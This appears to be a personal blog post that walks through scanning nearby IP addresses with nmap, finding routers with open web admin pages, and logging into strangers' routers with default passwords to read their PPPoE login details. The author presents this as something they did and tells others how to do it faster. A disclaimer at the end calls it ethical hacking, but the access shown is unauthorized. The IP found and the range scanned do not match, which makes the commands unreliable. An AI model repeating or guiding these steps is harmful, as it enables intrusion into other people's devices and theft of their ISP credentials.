1. To check my actual network IP address: http://www.whatismyip.com
2. A dictionary of common router passwords: http://www.routerpasswords.com
3. nmap and whois tools available in Linux. [Try “nmap –help” for quick description of the switches available. whois is self-explanatory.]
If users do not take necessary precautions, it’s too easy to reach the router settings of broadband users.
First I checked my actual IP address @ http://www.whatismyip.com
I found that it is 117.192.11.xxx
So I ran nmap on this range on port 80:
$ nmap 188.8.131.52-255 -p80 > scanres
I opened the file scanres in vi and searched for “open”. I found the following entries:
In order to check some more information like who the IP belongs to, I used:
$ whois 117.192.11.xxx
Now I have got a vulnerable IP with port 80 open. I tried opening it in Firefox and it asked for the username and pwd:
I tried out default usernames and pwds for some common routers in India from www.routerpasswords.com and I could hack into the router in 4/5 tries. [Sometimes the authentication string shows the make of the router. For example TD-W8901G means a TP-Link router, IB-xxxxx means an IBall router. Some manufacturers must be real dumb to do it!] I entered the Interface Setup and could find the PPPoE username. And an 8-dot password almost always means “password”. As users have no way of changing it, the “password” is as good as hard-coded.
Finding a weak router will take around 40 seconds for a seasoned hacker who will reduce the IP range +/-25 his own IP as the nmap scan range.
DISCLAIMER: THIS IS STRICTLY A DEMONSTRATION OF ETHICAL HACKING AND TO ALERT PEOPLE SO THEY CAN GUARD THEMSELVES AGAINST SUCH VULNERABILITIES. PLEASE DO NOT USE THIS INFORMATION FOR DATA THEFT. THAT’S NOT MY INTENTION.